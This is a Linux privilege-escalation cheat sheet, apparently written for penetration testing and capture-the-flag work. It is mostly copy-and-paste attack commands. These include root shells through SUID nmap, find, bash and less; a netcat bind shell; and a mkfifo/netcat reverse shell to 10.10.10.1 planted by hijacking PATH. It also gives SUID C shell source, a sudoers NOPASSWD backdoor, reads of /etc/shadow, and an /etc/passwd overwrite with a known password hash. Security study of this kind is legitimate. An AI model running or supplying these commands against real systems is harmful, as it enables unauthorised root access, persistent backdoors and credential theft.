utility ESSPrivilege Escalation Through SUID Executables
Reference: https://pentestlab.blog/2017/09/25/suid-executables/
The following commands can discover all the SUID executables that are running on the system.
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
Discovery of SUID Executables
- Privilege escalation with nmap
sudo nmap --interactive>!sh
nmap -V
nmap> !sh
sh-3.2# whoami
root
- Metasploit Module for nmap privilege escalation
exploit/unix/local/setuid_nmap
- Privilege escalation with Find & Permission
touch pentestlab
find pentestlab -exec whoami \;
find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;
Connecting into the opened port will give a root shell.
netcat 192.168.1.189 5555
id
cat /etc/shadow
Privilege escalation with Bash & Permission
bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
Privilege escalation with LESS & Permission
The utility Less can also execute an elevated shell. The same principle applies and for the More command.
less /etc/passwd
!/bin/sh
What services are running as root?:
ps aux | grep root
check users on system and see which of the users u can have access without password
sudo -u qwesi /bin/bash ----> where qwesi is the user with no password
sudo su - www-data -s /bin/bash
Run a command as a user other than root
sudo -u haxzor /usr/bin/vim /etc/apache2/sites-available/000-default.confAdd a user or change a password
/usr/sbin/useradd -p 'openssl passwd -1 thePassword' haxzor echo thePassword | passwd haxzor --stdinLocal Privilege Escalation Exploit in Linux
SUID(Set ownerUserIDup on execution)
Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.below are some quick copy and paste examples for various shells:
SUID C Shell for /bin/bash int main(void){ setresuid(0, 0, 0); system("/bin/bash"); } SUID C Shell for /bin/sh int main(void){ setresuid(0, 0, 0); system("/bin/sh"); } Building the SUID Shell binary gcc -o suid suid.c For 32 bit: gcc -m32 -o suid suid.cCreate and compile an SUID from a limited shell (no file transfer)
echo "int main(void){\nsetgid(0);\nsetuid(0);\nsystem(\"/bin/sh\");\n}" > privsc.c gcc privsc.c -o privsc
Handy command if you can get a root user to run it. Add the www-data user to Root SUDO group with no password requirement:
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/updateYou may find a command is being executed by the root user, you may be able to modify the system PATH environment variable to execute your command instead. In the example below, ssh is replaced with a reverse shell SUID connecting to 10.10.10.1 on port 4444.
set PATH="/tmp:/usr/local/bin:/usr/bin:/bin" echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2 > & 1|nc 10.10.10.1 4444 > /tmp/f" >> /tmp/ssh chmod +x sshSearchSploit
searchsploit –uncsearchsploit apache 2.2 searchsploit "Linux Kernel" searchsploit linux 2.6 | grep -i ubuntu | grep local searchsploit slmailKernel Exploit Suggestions for Kernel Version 3.0.0
./usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl -k 3.0.0Precompiled Linux Kernel Exploits -Super handy if GCC is not installed on the target machine!
Collect root password
cat /etc/shadow |grep rootFind and display the proof.txt or flag.txt - LOOT!
cat `find / -name proof.txt -print`
Creating Password for a user through /etc/passwd file
$1$salt$bvDqL29IXg3sPhjeBKC/./
cp /etc/passwd /tmp/passwd
sed -i -e 's/taviso:x:/taviso:$1$salt$bvDqL29IXg3sPhjeBKC\/.\/:/g' /tmp/passwd
cp /tmp/passwd /etc/passwd
python3 -c 'import pty; pty.spawn("/bin/bash");'
www-data@hackday:/$ su taviso
su taviso
Password: letmein
I'll admit - I had no idea you could specify an account password in the
/etc/passwdfile. Every day is a school day!